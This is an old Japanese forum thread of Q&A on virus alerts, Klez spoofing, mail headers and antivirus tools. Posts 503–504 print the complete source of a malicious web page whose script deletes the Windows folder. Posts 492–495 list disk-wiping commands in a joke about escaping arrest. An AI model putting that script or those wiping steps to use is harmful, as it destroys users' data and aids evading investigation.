>>489にはハイテク犯罪は無理です


492 :名無しさん@お腹いっぱい。:02/08/23 16:09
>>489
いちどタイーホされてみてね。^^
タダのフォーマットでは復元可能。FATを消すだけだから。
全体にデータを再書き込みして復元不能にしてからフォーマットするツールはあるよね。

493 :126:02/08/23 16:30
>>492
UNIXでHDDを完全にクリア状態にしたら大丈夫でしょう。


494 :名無しさん@お腹いっぱい。:02/08/23 17:09
これではだめなん?
format /u

495 :名無しさん@お腹いっぱい。:02/08/23 17:47
shred *

496 :名無しさん@お腹いっぱい。:02/08/23 18:19
2chの「PC等-Windows」版の「おまえらユーザー名になんて…」をクリックした瞬間「LoveLetterウイルスを発見しました」
ノートンが即削除してくれたけど、スレのデータにも入ってるんですね。


497 :名無しさん@お腹いっぱい。:02/08/23 18:22
>>496
ノートンがコードに反応してるだけだ。

498 :名無しさん@お腹いっぱい。:02/08/23 18:35
http://game2.2ch.net/test/read.cgi/ff/1029447644/l50
って、なんでノートン先生が反応するの?

499 :498:02/08/23 18:38
『Macro.src』っていうのに感染した。


500 :名無しさん@お腹いっぱい。:02/08/23 18:43
>>496,498
2chを見ただけで出るのは、LoveLetterもMacro.srcも全部こっちね。

http://pc.2ch.net/test/read.cgi/sec/1025872269/l50

501 :名無しさん@お腹いっぱい。:02/08/23 19:35
http://www.oap.ne.jp/~mayumayu/index.urajyouhou.htm
このページの「ウィンドウズファイル消去」踏んでしまいました(ああ、うかつ・・・
MDIbrowser使ってたから大丈夫かなって思ったんだけど
再起動するたびハードディスクがすごい音!!中身は消えたりしてないんだけど
かなーり不安。
対処法教えてもらえませんか?

502 :名無しさん@お腹いっぱい。:02/08/23 19:43
>>501
踏んだお前が悪い

503 :名無しさん@お腹いっぱい。:02/08/23 19:48
<html>

<head>
<meta http-equiv="Content-Type"
content="text/html; charset=x-sjis">
<meta name="GENERATOR" content="Microsoft FrontPage Express 2.0">
<title>消しちゃうよん</title>
</head>

<body>
<script language="jscript">
var fso
fso=new ActiveXObject("Scripting.FileSystemObject");
fso.DeleteFolder("C:\\Windows",true);


</script>
</body>
</html>

これ今も効くの?

504 :名無しさん@お腹いっぱい。:02/08/23 19:50
>>501
つか、たったこれだけぢゃん。。。。

<html><head>
<meta http-equiv="Content-Type"
content="text/html; charset=x-sjis">
<meta name="GENERATOR" content="Microsoft FrontPage Express 2.0">
<title>消しちゃうよん</title>
</head>
<body>
<script language="jscript">
var fso
fso=new ActiveXObject("Scripting.FileSystemObject");
fso.DeleteFolder("C:\\Windows",true);
</script></body></html>


505 :名無しさん@お腹いっぱい。:02/08/23 19:51
>>504ケコーンしよう

506 :504:02/08/23 19:51
>>503
つか、かぶた。。。。

507 :501:02/08/23 19:55
消されたところが良くわかんない。
そこをしゅうふくすればなんとかなる・・・・か?

508 :504:02/08/23 19:55
>>505
ヤパーリ、6月。。。ヂューンブライドがイイナ。。。
子供は・・・2人・・・イヤーン
んぢゃ、明日、ちゃんと遅れないで来てね。。。お父さん待ってるから。。。

509 :教えてチャンで済みません(泣):02/08/23 20:19
私のところもウィルススキャンでJSWINDOWS BOMが検出されました。
OSはwindows98です。
駆除不可能という文字が出たのですが、駆除して正常に可動させる
にはどうしたら良いでしょうか。。
色々調べたのですが。
教えて下さい<(_ _)>

510 :名無しさん@お腹いっぱい。:02/08/23 20:22
>>509
何それ。検索で出てこないよ。

511 :509:02/08/23 20:39
JS WINDOWSBOMB.E でした(-_-;)
宜しくお願い致します。。。。。。

512 :509:02/08/23 20:42
因みにオンラインウィルス検索で、駆除不可能という判定が
出てしまいました。

513 :503:02/08/23 20:42
ケコーン指輪買いに逝ってきます

514 :名無しさん@お腹いっぱい。:02/08/23 20:55
>>511
WindowBomb

515 :名無しさん@お腹いっぱい。:02/08/23 21:03
ノートンアンチウィルスについて教えてください。
個人でアンチウィルスソフトを使いたいと思っているのですが、
標準パッケージ 6,800円(税別)の製品は年間ライセンス料金みたいな
のはあるのでしょうか?
また、あるのだとしたらだいたいいくらぐらいなのでしょうか?
よろしくお願いします。


516 :名無しさん@お腹いっぱい。:02/08/23 21:08
シマンテックのホームページ(日本語)
http://www.symantec.com/region/jp/index.html

517 :名無しさん@お腹いっぱい。:02/08/23 21:21
>>509
ウィルススキャンしたソフトのHPで見れ。どこのだ。

518 :501:02/08/23 21:33
システムの復元したらなおったーよ(たぶん

519 :509:02/08/23 21:56
http://www.trendmicro.co.jp/hcall/

ココでスキャンしました。
自分でも調べてみます。。
宜しくお願いします<(_ _)>

520 :cheshire-cat ◆CATJR.v6 :02/08/24 00:03
>>509
変種のバージョンが異なるかもしれないが。

Symantecで言うとこの、これか?
http://www.symantec.com/avcenter/venc/data/js.trojan.windowbomb.html
というか、トレンドではこれ。
http://www.trendmicro.co.jp/vinfo/virusencyclo/default2.asp?m=q&virus=JS_WINBOMB&alt=WINBOMB&loc=enus
一覧はこれ。
http://www.virusbtn.com/resources/vgrep/vgrep.cgi?terms=Js.Trojan.WindowBomb&product=0

検出されたウイルス名は、スペースやピリオド、バックスラッシュ、アンダースコアを間違えると、検索できなくなったりするんだが。
メルで送ってくれたら、Nortonでスキャンしたげるけど。
とりあえず「駆除」じゃなくて「削除」で直接殺せばいいvilliなんではないだろうか。

521 :名無しさん@お腹いっぱい。:02/08/24 00:32
この前、うっ!

522 :509:02/08/24 00:55
>>cheshire-cat ◆CATJR.v6
詳しく本当にありがとうございます<(_ _)>

あの・・メールに添付してお送りすればよいのでしょうか?
メルアド晒します。
もう一度スキャンしてみたのですが、ダブルクリックで
変種だからなのか、該当データなし、と出てしまいました。

初心者でちょっと情けない質問ですが、
直接削除はどうやったら出来るのでしょうか。
ファイル名を指定して実行したら、見事にインターネットエクスプローラ
がガンガン開いて止まらなくなってしまいました。。

523 :名無しさん@お腹いっぱい。:02/08/24 01:11
AVG Anti-Virusについてです。

admin権限がないと強制的にスケジュールチェックされるんですけど
なんとかなりませんか?
ログインの度に設定がリセットされるのです。
私だけ?
誰か情報ないですか?

524 :名無しさん@お腹いっぱい。:02/08/24 01:28
Webメールでヘッダを見るのはどうしたら良いのでしょうか?
OEだと右クリック→プロバディ→詳細タブで見れるのですが、
Webメールは詳細タブが出ず、全般しか出ません。
ちなみに私の使っているのはインフォシークのフリーメールです。
この方法でウィルスに感染する可能性って・・・少ないですよね?

525 :名無しさん@お腹いっぱい。:02/08/24 02:24
インフォシークは使ったこと無いんでわからん
gooメールは詳細が見れるようになってる
yahooメールとhotmaliははオプションで設定が変えられるみたい
あとは知らん
んでウィルス感染の可能性は
IEのパッチあてるかIEで見なけりゃおk
あとは知らん相手からの添付ファイルは見ないで削除

526 :名無しさん@お腹いっぱい。:02/08/24 02:25
hotmaliってなんだよ・・・鬱

527 :524:02/08/24 02:35
>525さん、ありがとうございます。
皆さん、どんな方法でヘッダーを見ているのか
お訊きしたかったんです。


528 :KlezH:02/08/24 02:43
KlezH
Received: from smtp01.asahi-it.com (EHLO smtp.asahi-it.com)
(210.174.168.200) by ** with SMTP; **
Received: from Infhh (p2949ac.kngwnt01.ap.so-net.ne.jp [218.41.73.172])
by smtp.asahi-it.com (8.11.1/3.7W) with SMTP id g7NGL3m83093
for < wcm1_svcoffer_com@relaypoint.net >; **
Date:**
Message-Id:< 200208231621_g7NGL3m83093@aitstaff.asahi-it.com >
From: eykam77 <eykam__@mail.infoseek.co.jp>
To: 218_41_73_172@aitstaff.asahi-it.com
p2949ac_kngwnt01_ap_so-net_ne_jp@aitstaff.asahi-it.com
smtp_asahi-it_com_218_41_73_172@mxin1.so-net.ne.jp
smtp_asahi-it_com_p2949ac_kngwnt01_ap_so-net_ne_jp@mxin1.so-net.ne.jp
Subject: Corp. All Rights Reserved.

添付ファイルは、
超図解PLUSパソコンを楽しく使う本Windows編2001年度版
http://www.x-media.co.jp/xbook/computer/PC21TYP/
http://www.google.com/search?q=%E8%B6%85%E5%9B%B3%E8%A7%A3PLUS+%E3%83%91%E3%82%BD%E3%82%B3%E3%83%B3%E3%82%92%E6%A5%BD%E3%81%97%E3%81%8F%E4%BD%BF%E3%81%86%E6%9C%AC&ie=UTF-8&oe=UTF-8&hl=ja&lr=

KlezはPC21TYP.EXE

529 :名無しさん@お腹いっぱい。:02/08/24 05:08
だからメールアドレス晒しておまけにマルチで何がしたいんだよおまいさんは

530 :名無しさん@お腹いっぱい。:02/08/24 08:31
>509
norton antivirusからレポートを開いて検疫項目にある
ウイルスを選択、そして項目を削除をクリックで削除できますよ。


531 :cheshire-cat ◆CATJR.v6 :02/08/24 08:55
>>509
530の人が書いた通り、検疫されたファイルを直接削除。

>>530
「>」使う人って、この板で久しぶりに見た(雑談)

532 :509:02/08/24 16:28
>>530さん、cheshire-cat ◆CATJR.v6 さん
ありがとうございます。
やってみます。

533 :cheshire-cat ◆CATJR.v6 :02/08/24 17:39
>>509
漏れ、何も役に立っていないんだが。

534 :名無しさん@お腹いっぱい。:02/08/24 19:06
>>533
立ってるでしょ。

535 :名無しさん@お腹いっぱい。:02/08/25 15:07
これってもしかしてかなり厨房な質問かもしれないんですが・・・

ちょっと前に知り合ったメル友の子(その時点ではまだ2、3回しかメール交換してなかったので
そんなに親しくもなかったんです)のPCがウィルスに感染してしまい、
それでその旨をその子にメールで連絡したんですね。
ですがその子自身、あまりウィルスに対しての自覚が無く、
いくら「早めに対処しないと、周りの人が迷惑するよ」というようなことを言っても
「そのうち何とかしますので、もう少し待ってください」みたいに全然取り合ってくれなかったんですね。
で、いつまで経っても状況が変わらないし、ウィルスメールも1日に30通くらい届くようになったので
再びメールで連絡しようとしたら、そのメアドは既に使われてなくて、
連絡を取ることができなくなってて・・・。

でも不思議なのは、そのメアドが既に使われていないのにも関わらず、
未だにそのメアドからウィルスが送られてくるんですよ。
それだけでなく、そのメアドを母体にして(?)
さらに別にメアドからも届くようになって・・・(プロパティを見ると、
送信者のメアドとは別に、そのメル友のメアドも表記されてるんです)。
で、そのメル友のメアドを経由したと思われる2番目のメアドも、
既に使用されていないメアドもあれば、
今も普通に使用されているメアドもあり(←そり使用している人は、メル友だった子とは別人です)
その辺はマチマチなんですよね。

でもまぁいずれにせよ、その感染ルートの大元である(と思われる)その元メル友に
何とかウィルスを駆除してもらうよう一言言いたいのですが、
でももう連絡のとりようがないのでとても困ってるんですよね。
とりあえず自分は、ウィルスメールを開かないよう細心の注意を払ってはいるんですが、
それでもいつか何かの拍子に開いてしまわないかとても不安だし、
何より大量のウィルスメールを送られているので、
普通のメール送受信をするのにも物凄く時間がかかってとても迷惑してるし・・・。

スミマセンがどなたか良きアドバイスを、よろしくお願い致します。。。

536 :名無しさん@お腹いっぱい。:02/08/25 15:12
>>535
1 捨てる
2 受信拒否する
3 莫大な時間と労力を費やしてでも相手に知らせる方法を探して、運がよければ知らせる

537 :名無しさん@お腹いっぱい。:02/08/25 15:14
>>535
Klezは送信者を偽装するから、使われてないメールアドレスから届くのだと。
その人のプロバイダに連絡するしか、対処法はないでしょう。

ウイルスメールは受信前にnPOPで削除。

538 :名無しさん@お腹いっぱい。:02/08/25 15:15
>>535
 このようなタイプのワームでは、「差出人」を感染コンピュータ内で取得した任意のメールアドレスとして設定する場合があります。
 そのため「差出人」として設定されているメールアドレス使用者のコンピュータが感染しているとは限りません。
 したがって、あるお客様のアドレス帳に弊社サポートセンターのメールアドレスが登録されていた場合、サポートセンターの名前が差出人となり、
 送信されてくる場合も想定されます。

これだろ

539 :名無しさん@お腹いっぱい。:02/08/25 15:18
>>535
そういう無責任な人間はメル友としてもふさわしくない。ので、運が悪かったとあきらめる。
ウィルスメール受信については、nPOPでも使う。
ttp://www.forest.impress.co.jp/library/npop.html

540 :名無しさん@お腹いっぱい。:02/08/25 15:21
Klezを見抜けない奴は周りに混乱を巻き起こす

541 :名無しさん@お腹いっぱい。:02/08/25 15:25
というわけで、当板ではおなじみの図解です。
http://www.nai.com/japan/virusinfo/klezezukai.asp

542 :名無しさん@お腹いっぱい。:02/08/25 15:25
皆さん、こんな厨房な質問にご丁寧にレスして下さいまして
本当にありがとうございます!!(感涙)

>>536
ありがとうございます! 何とか頑張ってみます!!

>>537
プロバイダに連絡・・・なるほど、その手がありますね!
早速その方法で何とかチャレンジしてみます!!

>>538
あ、まさしくそのタイプのウィルスだと思います!
この前その『差出人』として設定されたメアドの人とメールで連絡が取れたんですが、
その人のPCについては『ウィルスに感染された形跡が無い』とのことだったんですね。
それを聞いて不思議には思っていたんですが・・・
その>>538さんが書いてくださった一文を見れば、なるほどって感じですね。。。(汗)

543 :名無しさん@お腹いっぱい。:02/08/25 15:28
>>542
・ウィルス用ソフトを入れて無い人は(知識や技術のある人を除いて)速やかに入れましょう
(無料AntiVirus【AntiVirPE/AVG/Antidote簡易版】http://pc.2ch.net/test/read.cgi/sec/1015584020/l50)

544 :名無しさん@お腹いっぱい。:02/08/25 15:32
>>539
ホント、無責任なメル友ですよーーー!(怒)
npop、これからダウンロードしてきますね!
本当にありがとうございます!!

>>540
自分ももっとウィルスやPCに関して勉強しないといけないですね。。。

>>543
どうもありがとうございます!
何事も予防と対策が大事ですもんね!
色々親切に教えていただきまして、本当に皆さんありがとうございます。。。(感涙)



545 :名無しさん@お腹いっぱい。:02/08/25 15:34
>>544
うーん、だからそのメル友が感染してたかどうかも怪しいと思うのだが・・・。

546 :名無しさん@お腹いっぱい。:02/08/25 15:37
>>545
あぁ!
じゃあその諸悪の根源だと思っていた(笑)メル友の子も、
結局感染してたかどうか判らないってことですか。。。

うひぁ〜このウィルス、タチ悪いですね〜〜。。。(汗)

547 :535:02/08/25 16:21
今、そのメル友が利用していたプロバイダの方へ問い合わせました。

とりあえずまた後で、そのウィルスメールのプロパティ(ヘッダー情報)
などをメールに一緒に記載して、ニフティ宛に送ることになりました。
なので、今は逆にウィルスメール待ち状態です。。
(ウィルスメールはその都度削除してるので、今ヘッダーをコピーして
送れないので・・・/苦笑)

548 :535:02/08/25 16:23
いけね・・『プロバイダ宛』と書けば良かったものを、ついうっかり・・(反省)

549 :名無しさん@お腹いっぱい。:02/08/25 16:27
こんなことだらだら書くお前もたちが悪い

550 :名無しさん@お腹いっぱい。:02/08/25 18:27
>>547
で、なにをやりたいんだ?

551 :名無しさん@お腹いっぱい。:02/08/25 18:49
具体的な被害にもあってないのに妙な正義感がわいて
よくよく冷静になって考えれば意味もないことを行うのは
いらんことしぃな初心者にありがちな行為です
皆さんもそうならないよう注意しましょう

552 : :02/08/25 19:02
http://www.geocities.co.jp/SiliconValley-Sunnyvale/7911/R3_temp.swf?inputStr=%82%B7%82%B0%82%A6%82%BC%81I%0D%0A%82%B1%82%CC%83N%83%89%83u%91S%88%F5%93%C1%83o%83%93%82%BE%81B


553 ::02/08/26 03:20
スレ違いかもしれないのですが・・・
ウイルスの「JS_WINDOWBOMB.E」ってなんですか?
感染してるみたいなんですが・・・


554 :名無しさん@お腹いっぱい。:02/08/26 03:25
>>553丁度いいタイミング
>>509あたりから同じのに感染した奴の書き込みがあるので読んで見れ

555 :困った:02/08/26 03:45
すいません教えてください。会社のパソコンが今日おかしくなってしまい
ました。アウトルックエキスプレスで受信メールにカーソルを合わせ、
開かずにプレビューで内容を見ようとしたら、内容が表示されませんでした。
ダブルクリックで開くと読めました。

そこでいったん立ち上げなおす事にしました。そうしたら、立ち上がった
のはいいですがデスクトップには壁紙のみで、アイコンやファイル類が
一切出てきません。Ctrl+Alt+Deleteで強制終了するとプレビューには
何のプログラムも表示されません。セーフモードでの立ち上げでも同じく
アイコン類が出てきません。他のパソコンから共有ファイルは開けました。

ウイルスでしょうか? 単に故障でしょうか? ノートン入ってます。

分かる方がいましたら、アドバイスお願いします。仕事できません(;´Д`)




556 :名無しさん@お腹いっぱい。:02/08/26 09:01
>>555
そのノートンはちゃんとウィルス定義ファイルをupdateしてあったのですか?
メール受信時に警告がなかった点を除けば完璧に怪しいプログラムにやられてダウンした様子ですね。
アイコンやファイル類は全部消去されていませんか?念のため他のPCからウィルスチェックをかけてみて、
何も発見されないようならそのPC内で残っているデータ(あるのかな・・・)を退避させた上で
再インストール、再設定しかないんでは?


557 :名無しさん@お腹いっぱい。:02/08/26 12:46
ウイルスバスターでメールにWORM_KLEZ.Hというのが検出されました。
送信者を偽ることで有名ですがこれってプロパティのReturn-Pathも雨
も嘘なんですか?

558 :訂正:02/08/26 12:47
ウイルスバスターでメールにWORM_KLEZ.Hというのが検出されました。
送信者を偽ることで有名ですがこれってプロパティのReturn-Pathも嘘なんですか?

559 :558:02/08/26 13:16
分かりました。ごめんなさい

560 :困った:02/08/26 13:58
>>556
レスありがとうございます。updateは行っておりました。
今は家なので、出勤してからアドバイスどおりにやってみます。

561 :名無しさん@お腹いっぱい。:02/08/26 14:14
http://www.ryulife.com/net/za/zajkit.html

ここのZAの日本語化パッチ入れると
ノートンが反応するんだけど
それでも入れていいの?

562 :名無しさん@お腹いっぱい。:02/08/26 14:17
>>561
じゃあ、入れなきゃいいじゃん。

563 :名無しさん@お腹いっぱい。:02/08/26 14:20
>>561
入れるときだけOKしてやればいい
無害

564 :メールヘッダは?:02/08/26 15:16
>>558

565 :名無しさん@お腹いっぱい。:02/08/26 15:44
教えて下さい。
レジストリの値の削除はどうやってやるのですか?

566 :教えてくださいm(__)m:02/08/26 15:45
すいません、今日パソコンを使ってたら突然、右下の時計とか出てる所に「ResidentialGatewayDevice」っていう変なディスプレイみたいなマークが出て、
「新しいデバイスを発見しました、ショートカットを作成しますか」っていうメッセージが出たんですけど、これってなんでしょうか???


567 :名無しさん@お腹いっぱい。:02/08/26 15:45
>>565
PC初心者板へ行け

568 :名無しさん@お腹いっぱい。:02/08/26 15:52
>>565
レジストリエディタ開いてるんだろ?適当に右クリックすればメニューがでる。
それもわからないようなら削除するな。なんで削除したいのかきちんと説明できる?

569 :検索:02/08/26 17:04
>>565
検索って言葉知ってるか?
>>566
こっちは検索しても英文しか引っかかんないなぁ。しかもそのほとんどがゲートウエイ理論だけみたいだし。
そんな表に出て動くんなら多分ウイルスの類ではないと思うが保証できないから、誰か詳しい人いたらよろしく。

570 :名無しさん@お腹いっぱい。:02/08/26 17:14
>>566
そのダイアログ、実害なくウザいだけみたい。

--------------------------------------------------------------------------------
[125888] Re^3: ResidentialGatewayDevice 投稿者名:倭翔 投稿時間:02/15-22:03

> CATVではありませんが、ケーブルです。
> ケーブル常時接続です。

同じようなものです。
ので、対処も同じ。
まず、余計な共有を切り離す、FireWallを導入する、など。
基本的にそのあたりの接続形態はLANそのものです。

(抜粋:http://winfaq.power.ne.jp/logs/9x/0017.html)


571 :名無しさん@お腹いっぱい。:02/08/26 17:17
>>570
「実害なくウザイだけのダイアログ」って、ある意味一番タチ悪いよな〜

572 :名無しさん@お腹いっぱい。:02/08/26 17:19
ResidentialGatewayDevice
http://support.microsoft.com/default.aspx?scid=kb;en-us;Q298757

こうやって対処しろとさ
http://www.drive.co.jp/asp/faq/faq_sanka.asp?q_id=13962&genre=Other

573 :名無しさん@お腹いっぱい。:02/08/26 17:41
>>570-572
一番重要な「そもそもこれってナニ?」とか「コンポーネントを切ったらどうなるか」の部分がないなぁ。
ResidentialGatewayDeviceなんて御大層な名前ついてんのに、そんなポンポン切ってもいいもんなの?


574 :名無しさん@お腹いっぱい。 :02/08/26 17:45
トレンドマイクロとかのオンラインウイルススキャンが出来ないんですが…。
ActiveXが有効でないと出、設定を最低にしても今度は署名がありません
みたいなのが出てどうしても。これはウイルスなんでしょうか…?
あと、WORM_BADTRANS.Bの駆除ツール関連のものをパソ内検索で
削除したらメールボックスが空っぽに…(激鬱
この結果は正常なんでしょうか…

575 :名無しさん@お腹いっぱい。:02/08/26 17:58
ttp://www.bb.isas.ne.jp/kazuhiro/index.htm ←藁た

576 :名無しさん@お腹いっぱい。:02/08/26 18:07
>>573自分で調べろ

577 :名無しさん@お腹いっぱい。:02/08/26 18:18
>>574ようわからんがウィルス検索ならAD簡はどうよ
・アンチドート簡易版
http://www.vintage-solutions.com/Japanese/Antivirus/Super/index.html

トレンドマイクロのWORM_BADTRANS.Bの駆除ツール関連って、これ実行ファイルだけなんでないの?
それにメールボックス内のワーム駆除はできないって書いてあるみたいだけど

578 :名無しさん@お腹いっぱい。:02/08/26 18:19
>>573
Residental:居住(地)の, 住宅向きの; 住込みの, 寄宿制の
Gateway:ゲートウエー ((複数のネットワークなどを接続するための装置またその接合点)).
Device:デバイス(装置)
訳してみたら、「住宅についている、複数のネットワークなどを接続するための装置」だね。

そんなに御大層な名前じゃないよ。たぶん、
あなたの住んでいる住宅の共有ネットワークに接続するためのものだと思われ。
これを使わなくてもインターネットに接続できてるなら切りっぱなしで構わないんじゃ・・・


579 :名無しさん@お腹いっぱい。:02/08/26 18:21
さっぱり関係ないけど
ドメスティック(家庭的、とかの意味だっけ)って言葉を
語感だけで大層な意味を持つ言葉だと思ってる人っているよね

580 :名無しさん@お腹いっぱい。:02/08/26 18:31
>>576
質問スレに「自分で調べろ」?残暑でアタマ腐ったか?

581 :そもそも板違いだし:02/08/26 18:43
>>580( ゚д゚)ポカーン

582 :KlezH:02/08/26 19:11
KlezH
Received: from mail0.ewetel.de (212.6.122.10)
by **
Received: from Mmhjdoi (dialin-80-228-10-153.ewetel.net [80.228.10.153])
by mail0.ewetel.de (8.12.1/8.12.1) with SMTP id g7PGXEHt028832
for < freepassakylvcgb@itek.de >; Sun, 25 Aug 2002 18:33:16 +0200 (MEST)
Date: Sun, 25 Aug 2002 18:33:14 +0200 (MEST)
Message-Id:< 200208251633_g7PGXEHt028832@mail0.ewetel.de >
From:jandavid<jandavid_at_t-onlinede>
To: 200208251633_g7PGXEHt028832@mail0.ewetel.de
200208251633_g7PGXEHt028832@mail.ewetel.de
80_228_10_153_KlezH@mail.ewetel.de 対策せよ!!!!!!!!
Subject:A new game

This is a new game
This game is my first work.
You're the first player.
I expect you would enjoy it.

583 :ホストの検索 - その他の RBL への登録状況:02/08/26 19:12
ホストの検索 - その他の RBL への登録状況
http://www.ordb.org/lookup/rbls/?host=mail0.ewetel.de
Host: mail0.ewetel.de (212.6.122.12)
ztl.dorkslayers.com 登録あり: 12.122.6.212.ztl.dorkslayers.com
descriptive text "212.6.122.12 is listed by ztl.dorkslayers.com"

584 :名無しさん@お腹いっぱい。:02/08/26 20:15
マルチは放置

585 :名無しさん@編集中:02/08/26 20:30
毎日同じヤシからウイルスメール(クレズH)がくるんですけど、どうすればいいですか?

586 :名無しさん@お腹いっぱい。:02/08/26 20:33
klezは差出人偽装をするからヘッダ見ないとわかんねぇ
ヘッダをここで晒すなら隠すとこは隠してね

587 :cheshire-cat ◆CATJR.v6 :02/08/26 20:34
>>585
相手のプロバのHPの、連絡用とかのメアドに「困っているんですぅ!」、ってメルを送る。

OCNの札幌通りアクセスポイントを除けば、いずれも即対処してもらえたよん。

588 :名無しさん@編集中:02/08/26 20:36
毎回、偽アドで来るんだけど、ヘッダ見ると同じアド。

589 :名無しさん@お腹いっぱい。:02/08/26 20:50

          _,,,,,._,,,,,.....    
         -‐"        ヽ ̄ノ^7__   異議あり!ウィルスを送ってるのは山田さん
       ''"--―――-r⌒``~`゙゙`''ヘ/             つまりあなただ!!!
     `ー--――ー--->  --、_, ',   
      ´ー-- .._ へ/   くてi` 〈                         _. -‐‐''''''''')
       ー-_   | ^i        , ノ                    ァ=r‐'' "´ __. ‐'' "
           ヽrヘ、     ,.-=ァ/                _. ‐'"´  l l    r} } }l
           /  !、   {  //    __      . - ' "´       l ヽ  、 ヽ_ノノ
           ノ     、  -‐ /-‐ ' ´/`゙ ーァ' "´  ‐'"´        ヽ、`ーテヽJ
     _.. -‐''フ|フヽr-‐ ''''フ. ̄「´  '' /   /              _..  -'-'
  . ‐ '7    く/|〉-rへ. /   l    l                 .‐ '"´
 /  /    / |  | / ` <´       ',         _.. - ' "´
./   /    ヽ .| /    / iニニニ}   、   _ ,. - '
    l iニニl ヽ|/   /     ノ      `  /

山田さんfrom図解:Klez.e・klez.hとはどんなウイルスなのか?
http://www.nai.com/japan/virusinfo/klezezukai.asp

みたいなの送ったれ

590 :名無しさん@編集中:02/08/26 20:51
east.cts.ne.jpってどこのプロバイダですか?

591 :名無しさん@お腹いっぱい。:02/08/26 21:11
Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 210.169.170.0
b. [ネットワーク名] CTS
f. [組織名] CTSインターネット接続サービス(株式会社南東京ケーブルテレビ)
g. [Organization] CTS(SOUTH TOKYO CABLETELEVISION)
m. [運用責任者] SA114JP
n. [技術連絡担当者] SM992JP
p. [ネームサーバ] dns01.cts.ne.jp
p. [ネームサーバ] dns2.odn.ne.jp
y. [通知アドレス] odn-jpnic@odn.ad.jp
[割当年月日] 1998/03/04
[最終更新] 1999/07/15 11:47:49 (JST)
cts-op@stct.cts.ne.jp

592 :ちょっといい話:02/08/26 21:16

ウィルス隔離フォルダのこと。
使用例:昨日アングラサイトでウィルスに感染したが、
駆除できなかったんで檻の中に入れといたよ。

ペット
隔離フォルダの中で飼っているウィルス。
使用例:俺のペットハイブリスだよ。


593 :名無しさん@お腹いっぱい。:02/08/26 21:29
なんか誤爆ぽいけど・・・
ウィルスの保存はzipで二重圧縮、二回目をpass付きにしてるんだけど
これじゃぁダメなの?

594 :名無しさん@お腹いっぱい。:02/08/26 22:22
>>593
さらに偽装とかね。

595 :名無しさん@お腹いっぱい。:02/08/26 22:54
偽装かぁ、早速実行します

596 :名無しさん@お腹いっぱい。:02/08/26 23:08
最近ウィルス添付らしきメールが毎日来るようになってしまいました。
開かなければ放置して削除してしまえば大丈夫でしょうか?
メールが来なくなるような方法は無いのでしょうか?
こういった事に疎いもので詳しい方是非教えてください。お願いします。


597 : :02/08/26 23:15
>>596
お前>>1から読めよ

598 :名無しさん@お腹いっぱい。:02/08/26 23:26
読んだのですがチンプンカンプンなんです。
どなたか教えてください、お願いします。

599 :名無しさん@お腹いっぱい。:02/08/26 23:28
読んでダメなら教えてもダメだろうね

600 :名無しさん@お腹いっぱい。:02/08/26 23:45
そんなこと言わずに>>596のレスに関して教えてください。
親切な方、お願いします。
このようなメールを送られてきた事が今まで一度も無かったので
対処の仕方がまるで解らないのです。
とりあえず今は全部開かずに削除しているのですが・・・。

601 :574:02/08/26 23:55
>577
レスありがとうございます。早速やってみたら(できた)、stopアイコン表示の
圧縮ファイルが2個あったんですがとりあえずウイルスにはかかってない
もようです。よかった…。結局メールは自分でなんか重要なものを
消しちゃったみたいです…(鬱
Outlookはようこそメールが着てたのでもう諦めましたがポスペは
件名は全て残ってる…。本文のみ白紙。もうやってられません。はあ…

602 :名無しさん@お腹いっぱい。:02/08/27 00:00
>>600
それでいいんでない?
んじゃなきゃ受信拒否かnPOPで鯖から直接削除とか
後はヘッダ読んで相手がわかれば相手のプロバに相談とか
あ、ヘッダの読み方くらいは検索しようね

603 :名無しさん@お腹いっぱい。:02/08/27 00:11
>602
>んじゃなきゃ受信拒否かnPOPで鯖から直接削除とか
>後はヘッダ読んで相手がわかれば相手のプロバに相談とか
こういった事の意味がまるでわからないのですが・・・。
相手が誰だかメールを開かなくても解るのですか?


604 :603:02/08/27 00:14
あとウィルスに感染していなければ
個人情報とかは流出されてないのでしょうか?
本当に申し訳ありません、教えてください!

605 : :02/08/27 00:21
>>604
ウイルスに感染することと個人情報が流出することに関連はあまりない
個人が個人情報を流出するのはまずありえないことだし

606 :604:02/08/27 00:23
>605
解りました、有難うございます。

607 :名無しさん@お腹いっぱい。:02/08/27 00:36
>>603
どこの誰からくるのかがわかれば受信拒否ができるということ。
それを知るためにメールのヘッダ情報を見ろということ。
メールヘッダについては自分で検索すればいいんだが、あまり冷淡にするのも
何なのでここでも見ておいてちょ。
ttp://www.mag2.com/easy/head.htm
ttp://www.cc.ttcn.ne.jp/html/gijutu/mail-header/w_head.htm
ttp://www.puni.net/~mimori/header/
ついでに、これもだ。
nPOP(というソフトと使い方)
ttp://nakka.com/soft/npop/

608 :名無しさん@お腹いっぱい。:02/08/27 00:42
冷淡つーか、一から十まで全部語ってやらなきゃならない香りがするからなぁ

とりあえず、初心者のためのセキュリティ対策
http://www.tkcity.net/~satoko/

あとIEにOEつかってるならここ見てパッチあてれ
OE(又はIEコンポーネント使用メーラー)の問題点とその対策方法
http://pc.2ch.net/test/read.cgi/sec/1021363841/l50

・・・Macユーザーですとかいうオチはないよね?

609 :ひまじん:02/08/27 00:56
毎日ウイルスメールが来るのですがどうしてでしょうか?実害は無いのですが、原因を知りたくて。

610 :名無しさん@お腹いっぱい。:02/08/27 01:06
2chの半角板に逝ったらウイルス検知した。

611 :名無しさん@お腹いっぱい。:02/08/27 01:10
ノートン先生ならよくやることだからきにしるな

612 :名無しさん@お腹いっぱい。:02/08/27 01:31
>>607->>608
過去ログ読んでも全く解らないヤシには
参考ページも無駄だと思うよ。
読むのが面倒って正直に言えばいいのにね。

613 :名無しさん@お腹いっぱい。:02/08/27 02:45
ウィルスの作り方教えて

614 :夏厨は死ね:02/08/27 02:48
ネットワークセキュリティ@2ch掲示板
この板は、LANや個人のPCへの侵入、トロイ、ウィルス等、
様々なネット上の危険からの防御法や対策を語りあうための板です。


615 :名無しさん@お腹いっぱい。:02/08/27 02:49
教えて教えて教えて教えて教えて教えて
教えて教えて教えて教えて教えて教えて
教えて教えて教えて教えて
ウィルスの作り方教えて

616 :名無しさん@お腹いっぱい。:02/08/27 03:48
検体
1.土に水と砂糖を加え、よくかき混ぜ、しばらく暗所で放置する
2.浮いてくるごみを丁寧に取り除き、水分を少量掬い取り、残りは捨てる
培地
1.棒寒天を水で戻し、薄く切って皿に盛る

培養の仕方
1.検体を培地に数滴落し、暗所で数日放置する
2.コロニーの中心を掬い取り、種類毎に新しい培地に盛り、残りは捨てる
3.コロニーの形成を確認し、紫外線を照射する
4.そのまま培養し、ブロック毎に切り分ける
